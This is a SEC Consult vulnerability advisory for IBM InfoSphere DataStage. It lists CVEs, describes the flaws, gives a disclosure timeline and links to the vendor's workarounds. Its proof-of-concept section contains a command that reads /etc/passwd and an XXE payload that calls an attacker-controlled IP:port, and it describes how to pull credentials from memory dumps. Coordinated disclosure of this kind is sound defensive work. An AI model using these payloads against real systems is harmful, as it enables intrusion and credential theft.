Multiple Vulnerabilities In IBM Infosphere Information Server / Datastage

Title

Multiple Vulnerabilities

Product

IBM Infosphere Information Server / Datastage

Vulnerable Version

9.1, 11.3, and 11.5 (including Cloud version 11.5)

Fixed Version

-

CVE Number

CVE-2017-1495, CVE-2017-1468, CVE-2017-1383, CVE-2017-1467

Impact

critical

Found

16.03.2017

By

Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) | SEC Consult Vulnerability Lab

The IBM Infosphere Datastage Application is affected by weak authorization flaws which allows a low privileged user to execute systems commands. Furthermore, it also has multiple other vulnerabilities affecting the application.

Vendor Description

“IBM® InfoSphere® DataStage® integrates data across multiple systems using a high performance parallel framework, and it supports extended metadata management and enterprise connectivity. The scalable platform
provides more flexible integration of all types of data, including big data at rest (Hadoop-based) or in motion (stream-based), on distributed and mainframe platforms.”

Source: http://www-03.ibm.com/software/products/en/ibminfodata

Business Recommendation

Attackers are able to bypass authorization controls to execute system commands. The vendor did not provide a patch but mitigation steps which have to be implemented.

SEC Consult recommends the vendor to conduct a comprehensive security analysis, based on security source code reviews, in order to identify all vulnerabilities in the Remote Management platform and increase the security for its customers.

Vulnerability Overview/ Description

1) Weak Authorization (CVE-2017-1467)

The Administrator Client allows users with high priviledges to execute commands. A low privileged application user can replay the same request and execute arbitrary commands on the server.

This happens because the application links to a single linux user in the backend server. The application privileges are based on this system user irrespective of the user role of the application user.

Hence, any command can be executed by a low privileged application user in the backend OS, depending on the privileges of the linux user the application is using.

2) XML eXternal Entity (XXE) Injection (CVE-2017-1383)

The Designer client allows users to import files in XML format. By tricking the user to import an XML file with malicious XML code to the application, it’s possible to exploit an XXE vulnerability within the application.

3) DLL Preloading

Dynamic Link Library (DLL) files are loaded from the application’s home directory without being verified. This may lead to execution of arbitrary files on the system as any users can replace the DLLs.

4) Loading Arbitrary Executables (CVE-2017-1468)

The Director and Designer Client do not check for any file signatures before loading and executing other executable files. Existing files can be replaced by any user with executable files, which will be executed from the toolbar.

5) Cleartext Passwords in Memory Dump (CVE-2017-1495)

User credentials are stored in clear text within the memory which can be dumped to retrieve these credentials.

Proof Of Concept

1) Weak Authorization (CVE-2017-1467)

Any command can be injected back to the Administrator Client to execute system commands.
Example:

SH -c "cat /etc/passwd"

2) XML External Entity Injection (XXE) (CVE-2017-1383)

For example by importing the following XML code, arbitrary files can be read from the client’s system. The following code generates the connection request from the client system to attacker system.

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

3) DLL Preloading

Removed proof of concept.

4) Loading Arbitrary Executables (CVE-2017-1468)

The following executables can be replaced to with other executable files with the same name :

Director.exe DSDesign.exe

5) Cleartext Passwords in Memory Dump (CVE-2017-1495)

Users can create a memory dump file based on the process id of the application. User credentials can be extracted by searching it in the dump file.

Vulnerable / Tested Versions

The following version has been tested which was the most recent one when the vulnerabilities were discovered:

  • IBM Infosphere Datastage 11.5

IBM states that the following products are also affected:

  • IBM InfoSphere Information Server: versions 9.1, 11.3 and 11.5
  • IBM InfoSphere Information Server on Cloud: version 11.5

Vendor Contact Timeline

2017-05-23: Contacting vendor through email (https://www-03.ibm.com/security/secure-engineering/report.html)
2017-06 – 2017-07: Coordinating with vendor to wait for their public disclosure of fixes/mitigations. Vendor also requested for more time to get back to us for some of the issues.
2017-07-29: Informed vendor that issue 3 will be released without proof of concept as fix/mitigation is not available.
2017-07-31: Vendor releases mitigation stepts / workarounds
2017-09-13: Public release of advisory

Solution

No patches are available. The vendor described mitigations/workarounds for the vulnerabilities.

Workaround

See the following URLs by the vendor for further details regarding mitigation steps:

1) Weak Authorization (CVE-2017-1467)
http://www-01.ibm.com/support/docview.wss?uid=swg22006063

2) XML eXternal Entity (XXE) Injection (CVE-2017-1383)
http://www-01.ibm.com/support/docview.wss?uid=swg22005803

Update: 3) DLL preloading
The vendor stated that the issue is resolved until 30th November 2017.

4) Loading Arbitrary Executables (CVE-2017-1468)
http://www-01.ibm.com/support/docview.wss?uid=swg22006067

5) Cleartext Passwords in Memory Dump (CVE-2017-1495)
http://www-01.ibm.com/support/docview.wss?uid=swg22006068

ADVISORY URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

EOF M. Shah / @2017

Contact

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult? Contact our local offices.